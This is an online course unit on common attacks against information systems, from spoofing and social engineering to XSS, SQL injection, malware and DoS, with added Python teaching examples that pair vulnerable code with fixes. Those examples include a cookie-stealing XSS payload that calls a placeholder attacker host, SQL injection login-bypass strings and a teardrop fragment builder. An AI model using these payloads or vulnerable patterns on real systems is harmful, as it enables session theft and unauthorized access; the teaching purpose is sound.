Topic outline
-
This unit introduces common threats and attack modes on information systems. The unit begins by differentiating between threats, attacks, and attack agents, and continues with a description of access control, spoofing, social engineering, application, web application, malware, and denial of service attacks. Understanding the method of an attack is instrumental to understanding the mitigation efforts used in information systems, and is a segue into the next unit on cryptographic models used to protect information from these attacks.
Completing this unit should take you approximately 10 hours.
-
In this section, you will learn the relationship and differences between threats and attacks. Recall that in the previous unit you learned about incident response. Incidents may occur due to attacks. An attack is a deliberate action meant to exploit a system. A threat is the potential for harm to a system; it becomes an attack when a threat agent acts on a weakness (a vulnerability) in that system. Attacks can be carried out by hackers, but not all hackers mean to cause harm: some are ethical hackers who test the security of a system with permission. Hackers can be white hat, blue hat, gray hat, or black hat, and can also be called crackers, phreakers, script kiddies, and hacktivists. This section will explain the differences between threats and attacks and the characteristics of different types of hackers. You will also learn about threat modeling, identifying threats, and anti-forensic principles such as data minimization.
-
Many types of malicious or suspicious activities are presented to information systems. To understand how to protect systems, you first need to understand the nature of these threats and attacks. To begin, watch this video to understand threats and attacks. What are the differences between these two concepts?
-
Review this article to understand that there are many types of threats to systems and to be able to define the five types of hackers and their techniques.
-
Watch this video to learn about threat models, how to identify threats, and the utility of anti-forensics.
-
-
To select the appropriate countermeasures to protect against system attacks, you must first know whether an attack is passive or active and whether the threat agents are non-target specific, employees, criminals, corporations, human-unintentional, human-intentional, or natural. You will then understand the mechanisms used to respond to the attack. There are many types of system attacks. This unit will explain some common types, including birthday attacks, botnets, man-in-the-middle attacks, teardrop attacks, war dialing, and zero-day exploits.
-
Information security personnel need to be aware of common types of malicious attacks on information systems. This video will describe the difference between passive and active attacks. The two passive attacks described are release of message contents and traffic analysis. The four active attacks are masquerade, replay, modification of messages, and denial of service. Pay attention to the characteristics of passive and active attacks. You should learn the method of attack and the mechanism to mitigate each of the two passive and the four active attacks.
-
Read this section, which describes threat agent, the actions a threat agent can take, and how to classify threat agents as non-target specific, employees, criminals, corporations, human-unintentional, human-intentional, or natural.
-
The birthday attack is a cryptographic attack based on the birthday paradox, the surprisingly high probability that two people in a small group share a birthday. Applying the birthday paradox improves the probability of finding a hash collision. Watch this video to understand the mathematics behind the birthday paradox. Do not be concerned with memorizing the mathematics. Instead, pay attention to how the probability increases as the number of people in the room increases, and how the birthday paradox reduces the effort needed to find a collision to roughly the square root of a brute-force search.
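The following Python example is added here to make the video's point concrete; it is not part of the course material. It computes the exact birthday probability, the approximate number of samples needed for a 50% collision, and then runs an actual birthday search against a toy 16-bit hash (the first 16 bits of SHA-256, an assumption chosen so the search finishes instantly). The message strings "msg-0", "msg-1", ... are constructed inputs.

```python
import hashlib
import math


def collision_probability(n, space):
    """Exact probability that at least two of n uniformly random draws from
    `space` possible values coincide (the birthday paradox)."""
    if n > space:
        return 1.0
    p_distinct = 1.0
    for k in range(n):
        p_distinct *= (space - k) / space
    return 1.0 - p_distinct


def samples_for_probability(p, space):
    """Approximate number of draws for collision probability p:
    n ~= sqrt(2 * space * ln(1 / (1 - p))). For p = 0.5 that is about
    1.18 * sqrt(space), the square root of a brute-force search of `space`."""
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - p))))


def truncated_prefix(msg, bits):
    """First `bits` bits of SHA-256(msg) as an integer (a toy short hash)."""
    digest = int.from_bytes(hashlib.sha256(msg.encode()).digest(), "big")
    return digest >> (256 - bits)


def find_truncated_collision(bits):
    """Birthday search: hash the constructed messages 'msg-0', 'msg-1', ...
    until two share the same `bits`-bit prefix. Returns (msg_a, msg_b, attempts).
    Expected attempts are about sqrt(pi/2 * 2**bits), far below the
    2**bits + 1 that brute force may need."""
    seen = {}
    attempts = 0
    while True:
        msg = f"msg-{attempts}"
        attempts += 1
        prefix = truncated_prefix(msg, bits)
        if prefix in seen:
            return seen[prefix], msg, attempts
        seen[prefix] = msg


if __name__ == "__main__":
    print(f"23 people, 365 days: {collision_probability(23, 365):.3f}")
    print(f"draws for a 50% collision in a 32-bit space: {samples_for_probability(0.5, 2**32)}")
    a, b, n = find_truncated_collision(16)
    print(f"16-bit collision {a!r} / {b!r} after {n} hashes (brute force: up to 65537)")
```

For a 32-bit digest the 50% figure is about 77,000 hashes rather than the 4 billion a preimage search would need, which is why collision resistance requires a digest twice as long as the security level you want.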
-
Botnets are groups of networked computers that are infected with malware and controlled remotely. Watch this video to learn the terminology used with botnets, such as botmaster and zombie, the purpose of botnets, and how to detect that a computer has been recruited into a botnet.
-
While you read, think about these questions: what kinds of people might choose to operate a botnet? Why might they do so? How can botnets be controlled? How big are most botnets?
-
In a man-in-the-middle attack, an attacker inserts themselves between two communicating parties and intercepts, and possibly alters, their traffic without either the sender or the receiver noticing. What methods can be used to create a man-in-the-middle attack?
-
This page explains the concept of a teardrop attack (overlapping IP fragments that crash a flawed reassembly routine), the effect these attacks have on a system, and the operating systems that are vulnerable to this kind of attack. Older versions of Windows and Linux were vulnerable to teardrop attacks, as were, through a later variant, Windows Vista and Windows 7.
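The following Python example is added here and is not from the page; it shows the fragment-overlap check that a teardrop attack defeats. It builds two constructed IPv4 fragments (no checksum, no real traffic) with the same identification field, parses the fragment offset and more-fragments bit from the raw header, and reports a second fragment that lies entirely inside the first, the shape of packet that made the original reassembly code compute a negative length. The addresses and identification values are arbitrary test data.

```python
import struct

IPV4_HEADER = struct.Struct("!BBHHHBBH4s4s")   # 20-byte header, no options
MF_FLAG = 0x2000                               # "more fragments" bit
OFFSET_MASK = 0x1FFF                           # 13-bit offset, in 8-byte units


def build_fragment(ident, offset_units, more, payload):
    """Construct a minimal IPv4 fragment for testing (checksum left as 0)."""
    header = IPV4_HEADER.pack(
        0x45, 0, 20 + len(payload), ident,
        (MF_FLAG if more else 0) | offset_units,
        64, 17, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    return header + payload


def parse_ipv4(pkt):
    """Extract the fields reassembly cares about from a raw IPv4 packet."""
    (vihl, _tos, total_len, ident, flags_off,
     _ttl, proto, _csum, _src, _dst) = IPV4_HEADER.unpack_from(pkt)
    ihl = (vihl & 0x0F) * 4
    offset = (flags_off & OFFSET_MASK) * 8
    return {
        "id": ident,
        "proto": proto,
        "offset": offset,
        "end": offset + (total_len - ihl),   # first byte past this fragment
        "more": bool(flags_off & MF_FLAG),
    }


def check_fragments(packets):
    """Group fragments by identification and flag overlaps. A fragment whose
    whole range is already covered ('contained') is the teardrop case: the
    original Linux code set its length to (end - previous_end), which went
    negative and corrupted kernel memory."""
    groups = {}
    for pkt in packets:
        f = parse_ipv4(pkt)
        groups.setdefault(f["id"], []).append(f)
    findings = []
    for ident, frags in groups.items():
        frags.sort(key=lambda f: f["offset"])
        reach = 0                                # bytes reassembled so far
        for f in frags:
            if f["offset"] < reach:
                kind = "contained" if f["end"] <= reach else "overlapping"
                findings.append((ident, kind, f["offset"], f["end"]))
            reach = max(reach, f["end"])
    return findings


def teardrop_sample():
    """Constructed teardrop-style pair: fragment 2 sits inside fragment 1."""
    first = build_fragment(0xBEEF, 0, True, b"A" * 36)    # bytes 0..35
    second = build_fragment(0xBEEF, 3, False, b"B" * 4)   # bytes 24..27
    return [first, second]


def benign_sample():
    """Two fragments that abut exactly, as a normal sender produces."""
    first = build_fragment(0x1234, 0, True, b"A" * 32)    # bytes 0..31
    second = build_fragment(0x1234, 4, False, b"B" * 8)   # bytes 32..39
    return [first, second]


if __name__ == "__main__":
    print(check_fragments(teardrop_sample()))
    print(check_fragments(benign_sample()))
```

Modern kernels reject or trim overlapping fragments, and many firewalls drop them outright; a check like this one is the kind of logic an intrusion detection sensor applies to raw packets.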
-
War dialing is an attack that exploits dial-up modem lines. While dial-up service has been almost completely replaced by broadband, it still exists in some areas.
-
War dialing is a brute-force attack: the attacker dials through a range of phone numbers looking for one that is answered by a modem. How can auditing and monitoring reveal indicators of a war dialing attack?
-
A "zero-day" vulnerability is one that is unknown to the vendor or for which no patch yet exists; the name refers to the vendor having had zero days to fix it, and a zero-day exploit is code that takes advantage of such a vulnerability. Zero-day attacks are dangerous because no vendor fix is available, so defenders must rely on compensating controls, such as limiting exposure of the affected component, until a patch ships. What should happen once a zero-day exploit is identified?
-
-
An attack commonly used today is spoofing, or pretending to be someone or something that you are not. Spoofing occurs for various reasons, and one common reason is financial gain. For instance, a website may be spoofed to obtain a bank account or credit card username and password. The prevention of spoofing is partly technical, but rests heavily on awareness training, that is, on knowing the methods used in spoofing attacks. As an information security professional, you may have to identify spoofing techniques or you may have to train personnel on spoofing methods, but first you must understand the techniques yourself. This unit will describe email spoofing, caller ID spoofing, and IP address spoofing, and will describe how to identify and counter these techniques.
-
Spoofing is posing as someone you are not. Read this page, which explains the concept of spoofing, popular spoofing techniques, and countermeasures for spoofing attacks.
-
This article gives an in-depth explanation of internet protocol (IP) address and email address spoofing. What are the steps for IP spoofing? Why might an attacker want to spoof an IP or email address?
-
Email spoofing is common today and can be dangerous, whether by delivering malware to your system or by impersonating you to others. How can you identify a spoofed email? Why do attackers try to spoof emails? How can you combat email spoofing?
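One concrete way to answer "how can you identify a spoofed email" is to check whether the From: header is backed by SPF and DKIM results that align with it, which is what DMARC does. The Python below is an added example, not from the page or any course reading. It parses the Authentication-Results header (RFC 8601 shape) that a receiving mail server adds, and compares the authenticated domains with the From: domain. The server name `mx.example.net` and the two messages are constructed; the organizational-domain helper is a deliberate simplification (it keeps the last two labels, which is wrong for domains such as `co.uk`).

```python
import email
import re
from email.utils import parseaddr

# Assumed hostname of our own inbound mail server. Only an Authentication-Results
# header written by it is trustworthy: a sender can insert a forged one upstream.
TRUSTED_AUTHSERV = "mx.example.net"


def domain_of(value):
    """Domain part of an address (or of a bare domain), lower-cased."""
    addr = parseaddr(value)[1] or value
    return addr.rpartition("@")[2].strip().lower()


def org_domain(domain):
    """Crude organizational domain for relaxed alignment: last two labels."""
    return ".".join(domain.split(".")[-2:])


def parse_auth_results(header):
    """Parse 'authserv-id; method=result prop=value ...' into
    (authserv_id, {method: (result, {prop: value})}). Only spf and dkim kept."""
    authserv, _, rest = header.partition(";")
    results = {}
    for clause in rest.split(";"):
        m = re.match(r"\s*(spf|dkim)=(\w+)(.*)", clause)
        if m:
            method, verdict, props = m.groups()
            results[method] = (verdict.lower(), dict(re.findall(r"([\w.]+)=(\S+)", props)))
    return authserv.strip(), results


def assess(raw_message):
    """Return reasons to distrust the From: header; an empty list means aligned."""
    msg = email.message_from_string(raw_message)
    from_domain = domain_of(msg.get("From", ""))
    header = msg.get("Authentication-Results")
    if header is None:
        return ["no Authentication-Results header: From is unverified"]
    authserv, results = parse_auth_results(header)
    findings = []
    if authserv != TRUSTED_AUTHSERV:
        findings.append(f"Authentication-Results written by {authserv}, not our MTA")
    spf = results.get("spf")
    if spf and spf[0] == "pass":
        if org_domain(domain_of(spf[1].get("smtp.mailfrom", ""))) != org_domain(from_domain):
            findings.append("SPF passed for a different domain than the From header")
    else:
        findings.append("SPF did not pass")
    dkim = results.get("dkim")
    if dkim and dkim[0] == "pass":
        if org_domain(dkim[1].get("header.d", "")) != org_domain(from_domain):
            findings.append("DKIM signing domain does not match the From header")
    else:
        findings.append("no passing DKIM signature")
    return findings


# Constructed messages, not real mail. SPOOFED is a "CEO fraud" message relayed
# through an unrelated bulk sender whose SPF passes for its own domain; LEGIT
# was signed and sent by the domain shown in From:.
SPOOFED = (
    "From: CEO <ceo@example.com>\n"
    "To: finance@example.com\n"
    "Subject: Urgent wire transfer\n"
    "Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=bounce@bulk-sender.invalid; dkim=none\n"
    "\n"
    "Please pay the attached invoice today.\n"
)
LEGIT = (
    "From: CEO <ceo@example.com>\n"
    "To: finance@example.com\n"
    "Subject: Lunch\n"
    "Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=bounce@example.com; dkim=pass header.d=example.com\n"
    "\n"
    "See you at noon.\n"
)

if __name__ == "__main__":
    print("spoofed:", assess(SPOOFED))
    print("legit:  ", assess(LEGIT))
```

Note that SPF alone passing is not evidence about the From: header; the spoofed message above passes SPF for the relay's own bounce domain, and it is the alignment check that exposes it.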
-
Phone number spoofing has become popular today, especially among telemarketers. Read this article and watch the video about caller ID spoofing. How can you avoid being spoofed? How should you react to spoofed calls?
-
Read this article, which explains IP address spoofing and what an attacker can gain with this type of attack.
-
-
Another type of attack is social engineering. Many are not aware that social engineering is a type of attack, as it is not a technical method but one that appeals to the trusting and social nature of humans. Social engineering is sometimes the most productive type of attack, as it is the simplest and least costly. You have probably seen social engineering methods used in movies: an investigator gathers information from papers thrown in the trash, a nefarious person watches over the shoulder of a coworker as they type on their phone or computer, or someone follows another person through a locked door of an apartment building. These methods can all be used to gather information or to gain access to a system. In this unit, the methods of social engineering examined include dumpster diving, shoulder surfing, tailgating, spear-phishing, and pretexting.
-
Social engineering preys on the fact that humans are the weakest link in information security. This article explains the social engineering model, outlines the two categories of social engineering attacks, and discusses techniques for preventing and mitigating social engineering.
-
Dumpster diving is a way to obtain information that has been improperly disposed of. What kinds of security leaks can be found "in the trash"?
-
Read this article, which gives another perspective on improperly disposed items and why they are valuable to dumpster diving attackers.
-
We should all be cognizant of "shoulder surfing" – people who can see our computer screens or keyboards. What can attackers gain by shoulder surfing? How can you tell when you might be vulnerable to a shoulder surfing attack?
-
Tailgating is following an authorized person through a controlled door without presenting one's own credentials. How does tailgating work? What are some of the factors used by successful tailgaters?
-
Watch this video, which explains how to prevent tailgating from happening in a secure area.
-
Phishing is a deceptive way to obtain sensitive information. Spear-phishing is a targeted way to attack systems within a particular organization using email addressed to specific individuals. Spear-phishing and whaling are very similar, but the target of the attack differs. Read this article, which explains methods of phishing, spear-phishing, and whaling. What is the purpose of whaling, and who is its target?
-
Pretexting is the use of an invented scenario (the pretext) to persuade a target to hand over information such as passwords or account details. Read this article, which explains the steps involved in pretexting.
-
-
Attacks are often launched against applications because application code is custom-built and frequently not covered by the network-level defenses organizations rely on. To understand how to protect against these attacks, the information security professional must understand the attack methods. There are many types of application attacks; some of the most common are discussed in this unit, including buffer overflows, time-of-check-to-time-of-use (TOCTTOU) race conditions, and escalation of privilege, together with firmware resilience. The methods used to prevent these types of attacks are also addressed.
-
Attackers often exploit applications because flaws in application logic are not blocked by network defenses such as firewalls, and an attack on an application can give the attacker the same result as an attack on the network. Watch this video, which describes application attacks and gives some examples of common application attacks. Notice that applications can also have zero-day attacks, which we discussed previously.
-
This video discusses application attacks further. What is the goal of application attacks? How can features such as cookies, attachments, malicious add-ons, header manipulation, and session hijacking make an application more vulnerable to attack?
-
Buffer overflow attacks can often be prevented by careful coding (bounds checking) and mitigated by system configurations such as non-executable memory and address space layout randomization. In this video, you will learn about buffers and how a buffer can be exploited in a buffer overflow attack. Pay attention to the seriousness of a buffer overflow attack and the possible outcome of this type of attack. What effect can the attack have on a system? How would a buffer overflow attack be initiated against a system? What procedures should be in place to avoid a buffer overflow attack? Which programming languages are vulnerable to buffer overflow attacks?
-
Watch this video to learn more about buffer overflows, including stack-based and heap-based overflows, buffer overflow myths, and ways to reduce buffer overflow attacks in code.
-
Time of check to time of use (TOCTTOU) is a race condition in which a program checks a condition, such as a file's permissions, and then acts on it, while an attacker changes the state between the check and the use. While you read, pay attention to the mechanics of a TOCTTOU attack as provided in the attack examples. Remember the most common platform where you might find a TOCTTOU bug. What methods can be used to prevent TOCTTOU from occurring in UNIX and in Microsoft Windows?
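The following Python example is added here to show the classic UNIX file-system TOCTTOU race and one way to close it; it is not taken from the reading. A privileged program checks with `access()` that a user-supplied path is readable and then opens it; in the window between the two calls the attacker replaces the path with a symbolic link to a file they may not read. The hardened version opens first with `O_NOFOLLOW` and inspects the open descriptor with `fstat()`, so there is no name to re-point. The temporary files and the `swap` callback that stands in for the attacker are constructed; the code assumes a UNIX-like system (Linux or macOS) and Python 3.8 or later.

```python
import os
import stat
import tempfile


def read_if_allowed_vulnerable(path, between=lambda: None):
    """TOCTTOU pattern: check with access(), then use with open(). `between`
    stands in for the attacker acting in the window between the two calls."""
    if not os.access(path, os.R_OK):
        raise PermissionError(path)
    between()                    # the race window
    with open(path) as f:
        return f.read()


def read_if_allowed_hardened(path, between=lambda: None):
    """Open first, then check the object actually opened: O_NOFOLLOW refuses a
    symlink at the final component, and fstat() inspects the descriptor, so
    it no longer matters when the attacker re-points the name."""
    between()
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC)
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("not a regular file")
        if st.st_uid != os.getuid():
            raise PermissionError("not owned by the calling user")
        chunks = []
        while chunk := os.read(fd, 4096):
            chunks.append(chunk)
        return b"".join(chunks).decode()
    finally:
        os.close(fd)


def demo():
    """Run the race in a temp dir. Returns (what the vulnerable reader leaked,
    whether the hardened reader refused). secret.txt stands in for a file the
    attacker may not read but the privileged program may."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.txt")
        upload = os.path.join(d, "upload.txt")
        with open(secret, "w") as f:
            f.write("SECRET")

        def reset():
            if os.path.lexists(upload):
                os.remove(upload)
            with open(upload, "w") as f:
                f.write("harmless")

        def swap():                # attacker: re-point the checked name
            os.remove(upload)
            os.symlink(secret, upload)

        reset()
        leaked = read_if_allowed_vulnerable(upload, swap)
        reset()
        try:
            read_if_allowed_hardened(upload, swap)
            refused = False
        except OSError:            # ELOOP from O_NOFOLLOW, or our own checks
            refused = True
        return leaked, refused


if __name__ == "__main__":
    print(demo())
```

The general rule is to make the check and the use a single operation on the same object: check the descriptor you hold rather than the name you were given, or drop privileges and let the kernel's own permission check on `open()` be the check.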
-
Privilege is the level of access a user or process has on a system. Read the section in this article about escalation of privilege to learn the meaning of the term. What is the difference between vertical and horizontal escalation of privilege? Who has the higher level of privilege, a user at the application level or a system administrator at the kernel level? How can this kind of attack be prevented?
-
Watch this video to learn more about privilege escalation from the viewpoint of a hacker. What is privilege escalation? Why is privilege escalation difficult to execute? What types of things might an attacker look for on a system to escalate their privileges?
-
-
The most common web application attacks are cross-site scripting (XSS) and SQL injection. Injection attacks feed malicious input into a web application so that it is interpreted as code (script or SQL) and alters the application's behavior. You can see why this type of attack is undesirable, as passwords or other personal information can be stolen without the owner's knowledge. There are ways to prevent injection attacks, and it may be the job of the security professional to ensure that appropriate procedures are followed to prevent them. This section describes XSS and SQL injection attacks and a few other types of web application attacks, as well as the recommended methods to prevent the attacks from occurring.
-
Some attacks work specifically against websites or web applications. This video will discuss some basic application attacks such as cross-site scripting, SQL injection, buffer overflow, integer overflow, directory traversal, command injection, lightweight directory access protocol (LDAP) injection, extensible markup language (XML) injection, and zero-day attacks. You will see how an attacker performs each type of attack. As you watch this video, think about why an attacker might attack an application instead of a network. What is the best defense against application attacks?
-
Read this article to learn about cross-site scripting (XSS). How does an attacker exploit an XSS vulnerability? Describe reflected and persistent XSS vulnerabilities. How can an XSS attack be prevented?
-
Review this selection to understand why cross-site scripting (XSS) attacks are categorized as injection attacks. Under what conditions do XSS attacks occur? You saw reflected attacks in the previous section, but review this category again and learn about another category: stored XSS attacks. Also, in this article, pay attention to the consequences of XSS attacks, ways to find flaws in order to prevent XSS attacks, and how to protect against an XSS attack.
-
Read parts two and three of this article to understand the actors in cross-site scripting (XSS), persistent, reflected, and DOM-based XSS types, and methods to prevent XSS.
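The following Python example is added for the three XSS readings above and is not from any of them. It shows the server-side side of reflected XSS: a search term copied straight into the page, the same term with output encoding applied, and two cases where encoding alone is not enough (an unquoted attribute, and a URL in an `href`, where a `javascript:` scheme survives escaping and must be rejected by scheme instead). Python is used for consistency with the other examples on this page; the rendering functions and payloads are constructed for the demonstration.

```python
import html
from urllib.parse import urlsplit


def render_vulnerable(query):
    """Reflected XSS: the search term is copied into the page as markup."""
    return "<p>Results for: " + query + "</p>"


def render_safe(query):
    """HTML body context: escape &, <, >, double and single quotes so the
    term is displayed as text rather than parsed as markup."""
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


def render_input_unquoted(query):
    """Escaping alone fails in an unquoted attribute: a space ends the value,
    and 'x onfocus=alert(1) autofocus' contains nothing to escape."""
    return "<input value=" + html.escape(query, quote=True) + ">"


def render_input_safe(query):
    """Quote the attribute and escape quotes; the value cannot break out."""
    return '<input value="' + html.escape(query, quote=True) + '">'


def safe_url(url):
    """Escaping does not neutralise a javascript: or data: href; restrict
    the scheme to http(s) before escaping."""
    if urlsplit(url.strip()).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_link_vulnerable(url):
    return '<a href="' + html.escape(url, quote=True) + '">profile</a>'


def render_link_safe(url):
    return '<a href="' + safe_url(url) + '">profile</a>'


if __name__ == "__main__":
    payload = '<script>fetch("https://evil.invalid/?c=" + document.cookie)</script>'
    print(render_vulnerable(payload))
    print(render_safe(payload))
    print(render_input_unquoted("x onfocus=alert(1) autofocus"))
    print(render_input_safe("x onfocus=alert(1) autofocus"))
    print(render_link_vulnerable("javascript:alert(document.domain)"))
    print(render_link_safe("javascript:alert(document.domain)"))
```

The lesson the readings make and the code illustrates: encode output for the context it lands in (HTML body, quoted attribute, URL, JavaScript string), and use an allow-list where encoding cannot express the rule, as with URL schemes. A Content Security Policy limits the damage when an encoding step is missed.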
-
You have learned about cross-site scripting as an injection attack on applications. This article will introduce you to another type of injection attack, aimed at the database behind an application: SQL injection. After reading, be able to explain what occurs during a SQL injection attack, how to prevent the attack, and how a SQL injection can compromise a system.
-
Read this article to understand the concept of SQL injection attacks. Although you are not expected to know how to code, review the code examples and try to understand how the safe version provided in each example prevents the attack.
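The following Python example is added here as a runnable companion to the article's code examples; it is not the article's code. It builds a constructed in-memory SQLite table, then implements the same login check twice: once by pasting the user's input into the SQL text, and once with a parameterized query. Two classic payloads, a comment that removes the password check and a tautology that matches every row, succeed against the first and fail against the second. Passwords are stored in plaintext only to keep the injection visible; a real system stores hashes.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table for the demonstration."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "Tr0ub4dor&3", "admin"),
        ("alice", "correct horse", "user"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: the caller's text becomes part of the SQL syntax."""
    sql = ("SELECT username, role FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password):
    """Parameterized query: the driver passes values separately from the
    statement, so quotes and comment markers in the input remain data."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


if __name__ == "__main__":
    conn = make_db()
    # Comment out the password check:
    #   WHERE username = 'admin' --' AND password = 'wrong'
    print(login_vulnerable(conn, "admin' --", "wrong"))
    print(login_safe(conn, "admin' --", "wrong"))
    # Tautology; AND binds tighter than OR, so every row matches:
    #   WHERE username = 'nobody' AND password = '' OR '1'='1'
    print(login_vulnerable(conn, "nobody", "' OR '1'='1"))
    print(login_safe(conn, "nobody", "' OR '1'='1"))
```

The safe version is not "escaping done right"; the query text is fixed at development time and the database never parses the user's input as SQL. Escaping the quotes by hand is fragile (character sets, numeric columns, second-order injection) and is not the recommended fix.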
-
In this unit, you previously learned about cross-site scripting and SQL injection attacks. In this article, you will learn how to define injection and the terms threat agents, attack vectors, security weaknesses, technical impacts, and business impact as they relate to injection attacks. There is also a detailed example of how an injection attack works within code.
-
-
You have learned about many types of attacks on a system. In this unit you will learn about the different types of malware and the harm they can cause a system. Malware can take the form of viruses, worms, Trojan horses, and logic bombs. Each type attacks a system and spreads to other parts of the system in a different manner. To understand how to combat and contain these types of attacks, it is important to understand how each type enters the system, its mechanism of harm, and how it infects other parts of the system.
-
Watch this video to learn the definition of malware and what it can potentially do to a system. Pay attention to the method that can prevent introducing malware into a system when installing new software. You will learn about some common types of malware as well as their mode of attack and what they attack in a system. The types of malware you will learn about are virus, Trojan, worm, rootkit, logic bomb, ransomware, botnet, adware, spyware, polymorphic virus, armored virus, and backdoor.
-
As you learned in the previous section, the harmful effect on the system depends on the function or type of malware used. In this section, you will learn about seven common effects malware can have on a system: overwhelming system resources, running malicious adware, running spyware, running ransomware, creating backdoors, disabling security functions, and creating botnets. Pay attention to the type of malware and the method used to create each effect.
-
Read this article on computer viruses, worms, Trojan horses, spyware, and adware. Be able to describe how a computer virus can spread throughout a system or network, and the effect a virus might have on a system. Think about how a worm affects a computer system, and how a worm is similar to or different from a virus. A Trojan horse is malicious software named after the Trojan horse of Greek mythology: it hides a harmful payload inside something that appears legitimate. Learn what a Trojan horse is and what it can do once activated in a system. What is the purpose of spyware and adware?
-
Watch this video to learn more about viruses, worms, and Trojan horses. After watching, you should be able to describe a virus and how it spreads, and the effect a virus can have on a system. You should also be able to describe a worm and a Trojan horse. Why this type of malware is called a Trojan horse should become clear, as well as why it should NOT be termed a virus. You will also learn how a worm spreads, and some history of the infamous Stuxnet worm.
-
After reading the section on the types of Trojan horses, you should be able to describe all seven Trojan horse types. Think about how Trojan horses are different from viruses and worms.
-
Read the section on logic bombs and DoS to understand what this type of code can do and how it can be used in a DoS attack.
-
-
Denial of service (DoS) attacks are used by hackers, and sometimes by governments, to prevent systems from operating. The method consists of flooding a system or its network with traffic until it can no longer serve legitimate requests or crashes. One famous attack occurred during the Russo-Georgian War in 2008, when the Georgian president's website and other Georgian websites were taken down by distributed denial of service (DDoS) attacks attributed to Russia. These attacks can hit any business, and the security professional should understand the concept of this type of attack and recognize it when it happens. This unit will describe denial of service (DoS) and distributed denial of service (DDoS) attacks and will explain what happens to a system during a successful attack. As we have discussed in other sections, it is important to understand the effects of this type of attack on the tenets of the CIA triad.
-
This video will explain the concept of a denial of service (DoS) attack. What is the goal for an attacker when committing a DoS attack? How is this type of attack accomplished?
-
A denial of service (DoS) attack and a distributed denial of service (DDoS) attack are similar, but the distributed form is far more difficult to defend against because the traffic comes from many sources at once. Watch this video as an introduction to the concept of a distributed denial of service (DDoS) attack. What is the intent of an attacker when initiating a DDoS? What systems are used to initiate the attack?
-
Read this to understand the objective of a denial of service (DoS) attack. When a DoS attack occurs, what happens to a system? Be able to explain how a DoS and a DDoS attack are related and how they differ.
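The following Python example is added here to show, on constructed web-server log lines, how the difference between a DoS and a DDoS shows up to a defender; it is not part of the reading. Requests are bucketed into fixed ten-second windows. A single client exceeding a per-source threshold is the DoS signature, and a window whose total exceeds a global threshold while no single client stands out is the DDoS signature that per-source rate limiting alone would miss. The log format, addresses, and thresholds are all assumptions for the demonstration.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone


def constructed_log():
    """Constructed access-log lines, '<time> <client> <method> <path> <status>'.
    Five normal clients, one single-source flood (40 requests in 10 s), and a
    distributed flood (20 hosts, 3 requests each) in the following 10 s."""
    base = datetime(2024, 3, 1, 12, 0, 0, tzinfo=timezone.utc)

    def line(seconds, ip, path="/login"):
        ts = (base + timedelta(seconds=seconds)).isoformat().replace("+00:00", "Z")
        return f"{ts} {ip} GET {path} 200"

    lines = [line(i, f"192.0.2.{i + 1}", "/") for i in range(5)]
    lines += [line(i / 4, "10.9.9.9") for i in range(40)]
    lines += [line(10 + (h + k) % 10, f"203.0.113.{h}")
              for h in range(1, 21) for k in range(3)]
    return lines


def parse_line(line):
    ts, ip, _method, _path, _status = line.split()
    return datetime.fromisoformat(ts.replace("Z", "+00:00")), ip


def find_floods(lines, window_s=10, per_source=20, total=50):
    """Bucket requests into fixed windows and flag (a) any single client with
    at least `per_source` requests in a window (DoS) and (b) any window whose
    total reaches `total` regardless of how it is spread across clients (DDoS)."""
    per_client = Counter()
    per_window = Counter()
    sources = defaultdict(set)
    for line in lines:
        ts, ip = parse_line(line)
        window = int(ts.timestamp()) // window_s
        per_client[(window, ip)] += 1
        per_window[window] += 1
        sources[window].add(ip)

    single = {}
    for (window, ip), n in per_client.items():
        if n >= per_source:
            single[ip] = max(n, single.get(ip, 0))
    distributed = []
    for window, n in sorted(per_window.items()):
        if n >= total:
            start = datetime.fromtimestamp(window * window_s, tz=timezone.utc)
            distributed.append({"window_start": start.isoformat(),
                                "requests": n, "sources": len(sources[window])})
    return {"single_source": single, "distributed": distributed}


if __name__ == "__main__":
    result = find_floods(constructed_log())
    print("single-source offenders:", result["single_source"])
    for w in result["distributed"]:
        print(f"{w['window_start']}: {w['requests']} requests from {w['sources']} sources")
```

In the distributed window each host sends only three requests, under any reasonable per-client limit, which is why DDoS mitigation has to act on aggregate load (upstream scrubbing, anycast capacity, protocol-level filtering) rather than on individual addresses.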
-
Watch this video for an in-depth explanation of the types of DoS and DDoS attacks and how they work. Once complete, you should recognize the terms and associate them to denial of service attack methods. Thinking about the CIA triad, what leg of the triad does a DoS attack affect?
-
-
-
Take this assessment to see how well you understood this unit.
- This assessment does not count towards your grade. It is just for practice!
- You will see the correct answers when you submit your answers. Use this to help you study for the final exam!
- You can take this assessment as many times as you want, whenever you want.
-